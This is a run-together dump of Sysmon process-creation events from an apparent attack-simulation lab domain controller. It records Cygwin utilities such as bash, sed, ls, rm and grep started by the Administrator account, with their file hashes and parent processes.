14:56:02.318{A8622C2F-5402-6078-0F0C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-0E0C-00000000AE01}5396C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056841Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.309{A8622C2F-5402-6078-0E0C-00000000AE01}5396C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056829Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.301{A8622C2F-5402-6078-0D0C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-0C0C-00000000AE01}4788C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056819Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.293{A8622C2F-5402-6078-0C0C-00000000AE01}4788C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.285{A8622C2F-5402-6078-0B0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-0A0C-00000000AE01}5800C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.277{A8622C2F-5402-6078-0A0C-00000000AE01}5800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056789Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.268{A8622C2F-5402-6078-090C-00000000AE01}6084C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-080C-00000000AE01}1476C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.260{A8622C2F-5402-6078-080C-00000000AE01}1476C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-070C-00000000AE01}4344C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.251{A8622C2F-5402-6078-070C-00000000AE01}4344C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.243{A8622C2F-5402-6078-060C-00000000AE01}2664C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-050C-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056747Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.234{A8622C2F-5402-6078-050C-00000000AE01}5312C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-030C-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.226{A8622C2F-5402-6078-040C-00000000AE01}4288C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-030C-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.219{A8622C2F-5402-6078-030C-00000000AE01}6332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056713Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.210{A8622C2F-5402-6078-020C-00000000AE01}1100C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-010C-00000000AE01}2408C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056703Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.202{A8622C2F-5402-6078-010C-00000000AE01}2408C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-FF0B-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056693Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.193{A8622C2F-5402-6078-000C-00000000AE01}6336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-FF0B-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056681Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.186{A8622C2F-5402-6078-FF0B-00000000AE01}3200C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.177{A8622C2F-5402-6078-FE0B-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-FD0B-00000000AE01}2824C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.169{A8622C2F-5402-6078-FD0B-00000000AE01}2824C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056647Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.160{A8622C2F-5402-6078-FC0B-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-FB0B-00000000AE01}5108C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.152{A8622C2F-5402-6078-FB0B-00000000AE01}5108C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056627Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.144{A8622C2F-5402-6078-FA0B-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-F90B-00000000AE01}928C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.136{A8622C2F-5402-6078-F90B-00000000AE01}928C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056607Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.127{A8622C2F-5402-6078-F80B-00000000AE01}1628C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-F70B-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056597Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.119{A8622C2F-5402-6078-F70B-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-F60B-00000000AE01}6084C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.110{A8622C2F-5402-6078-F60B-00000000AE01}6084C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056575Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.102{A8622C2F-5402-6078-F50B-00000000AE01}6748C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-F40B-00000000AE01}6448C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.093{A8622C2F-5402-6078-F40B-00000000AE01}6448C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-F20B-00000000AE01}2664C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056555Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.085{A8622C2F-5402-6078-F30B-00000000AE01}4288C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-F20B-00000000AE01}2664C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056543Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.077{A8622C2F-5402-6078-F20B-00000000AE01}2664C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.068{A8622C2F-5402-6078-F10B-00000000AE01}1100C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-F00B-00000000AE01}1028C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056521Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.060{A8622C2F-5402-6078-F00B-00000000AE01}1028C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-EE0B-00000000AE01}5904C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056511Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.052{A8622C2F-5402-6078-EF0B-00000000AE01}6336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-EE0B-00000000AE01}5904C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056499Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.044{A8622C2F-5402-6078-EE0B-00000000AE01}5904C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.035{A8622C2F-5402-6078-ED0B-00000000AE01}5852C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-EC0B-00000000AE01}5344C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056477Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.026{A8622C2F-5402-6078-EC0B-00000000AE01}5344C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056465Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.017{A8622C2F-5402-6078-EB0B-00000000AE01}3156C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-EA0B-00000000AE01}1496C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.008{A8622C2F-5402-6078-EA0B-00000000AE01}1496C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-E80B-00000000AE01}6552C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.000{A8622C2F-5402-6078-E90B-00000000AE01}3008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-E80B-00000000AE01}6552C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056433Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.992{A8622C2F-5401-6078-E80B-00000000AE01}6552C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056421Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.984{A8622C2F-5401-6078-E70B-00000000AE01}6440C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-5401-6078-E50B-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056406Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.976{A8622C2F-5401-6078-E60B-00000000AE01}6084C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-5401-6078-E40B-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056401Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.975{A8622C2F-5401-6078-E50B-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-E30B-00000000AE01}4336C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 